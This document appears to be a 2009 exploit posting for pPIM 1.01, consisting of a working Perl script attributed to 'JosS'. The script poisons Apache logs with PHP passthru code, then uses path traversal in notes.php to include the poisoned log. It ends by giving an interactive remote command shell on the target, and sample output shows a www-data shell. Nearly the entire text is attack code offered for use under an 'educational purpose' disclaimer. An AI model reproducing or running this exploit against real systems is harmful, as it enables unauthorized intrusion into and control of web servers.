ppim-exec.txt
Posted on 23 February 2009
#!/usr/bin/perl #################################################################### # pPIM 1.01 (notes.php id) Remote Command Execution Exploit # url: http://www.phlatline.org/docs/files/ppim.zip # # Author: Jose Luis Gongora Fernandez (a.k.a) JosS # mail: sys-project[at]hotmail[dot]com # site: http://www.hack0wn.com/ # team: Spanish Hackers Team - [SHT] # # thanks for the base code: CWH Underground # but I changed many things and fix bugs. # # Hack0wn Security Project!! # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # #################################################################### # OUTPUT: (tested on localhost) # # Trying to Inject the Code... # Successfully injected in ../../../../../../../var/log/apache2/access.log # # [shell]:~$ id # uid=33(www-data) gid=33(www-data) groups=33(www-data) # [shell]:~$ uname -a # Linux h4x0rz 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686 GNU/Linux # [shell]:~$ exit # joss@h4x0rz:~/Desktop$ use LWP::UserAgent; use IO::Socket; use LWP::Simple; @apache=( "../../../../../../../apache/logs/error.log", "../../../../../../../apache/logs/access.log", "../../../../../../../apache/logs/error.log", "../../../../../../../apache/logs/access.log", "../../../../../../../apache/logs/error.log", "../../../../../../../apache/logs/access.log", "../../../../../../../etc/httpd/logs/acces_log", "../../../../../../../etc/httpd/logs/acces.log", "../../../../../../../etc/httpd/logs/error_log", "../../../../../../../etc/httpd/logs/error.log", "../../../../../../../var/www/logs/access_log", "../../../../../../../var/www/logs/access.log", "../../../../../../../usr/local/apache/logs/access_log", "../../../../../../../usr/local/apache/logs/access.log", "../../../../../../../var/log/apache/access_log", "../../../../../../../var/log/apache2/access_log", "../../../../../../../var/log/apache/access.log", "../../../../../../../var/log/apache2/access.log", "../../../../../../../var/log/access_log", "../../../../../../../var/log/access.log", "../../../../../../../var/www/logs/error_log", "../../../../../../../var/www/logs/error.log", "../../../../../../../usr/local/apache/logs/error_log", "../../../../../../../usr/local/apache/logs/error.log", "../../../../../../../var/log/apache/error_log", "../../../../../../../var/log/apache2/error_log", "../../../../../../../var/log/apache/error.log", "../../../../../../../var/log/apache2/error.log", "../../../../../../../var/log/error_log", "../../../../../../../var/log/error.log", "../../../../../var/log/access_log", "../../../../../var/log/access_log" ); system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "####################################################################### "; print "# pPIM 1.01 (notes.php id) Remote Command Execution Exploit | By JosS # "; print "####################################################################### "; if (!$ARGV[0]) { print "Usage: perl exploit.pl [host] "; print " perl exploit.pl localhost "; exit;} $host=$ARGV[0]; $path="/notes.php?mode=edit&id="; # change if it is necesary # if ( $host =~ /^http:/ ) {$host =~ s/http:////g;} print " Trying to Inject the Code... "; $CODE="<? passthru($_GET[cmd]) ?>"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host. "; print $socket "GET /images/"."##%$$%##".$CODE."##%$$%##" . "HTTP/1.1"; print $socket "Host: ".$host." "; print $socket "Connection: close "; close($socket); if ( $host !~ /^http:/ ) {$host = "http://" . $host;} foreach $getlog(@apache) { chomp($getlog); $find= $host.$path.$getlog; # $find= $host.$path.$getlog."%00"; $xpl = LWP::UserAgent->new() or die "Could not initialize browser "; $req = HTTP::Request->new(GET => $find); $res = $xpl->request($req); $info = $res->content; if($info =~ /##\%$$\%##/) # change if it is necesary {print "Successfully injected in $getlog ";$log=$getlog; last;} } print "[shell]:~$ "; chomp( $cmd = <STDIN> ); while($cmd !~ "exit") { $shell= $host.$path.$log."&cmd=$cmd"; # $shell= $host.$path.$log."%00&cmd=$cmd"; $xpl = LWP::UserAgent->new() or die "Could not initialize browser "; $req = HTTP::Request->new(GET => $shell); $res = $xpl->request($req); $info = $res->content; if ($info =~ /##%$$%##(.*?)##%$$%##/sg) {print $1;} print "[shell]:~$ "; chomp( $cmd = <STDIN> ); } # __h0__
